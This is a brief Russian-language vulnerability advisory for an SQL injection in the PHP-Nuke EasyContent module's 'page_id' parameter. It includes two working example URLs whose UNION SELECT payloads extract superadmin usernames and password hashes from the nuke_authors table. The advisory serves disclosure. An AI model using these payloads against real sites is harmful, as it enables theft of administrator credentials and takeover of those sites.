Программа: PHP-Nuke Module EasyContent

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «page_id» сценарием modules.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/* */union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/* */union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*



Оставить мнение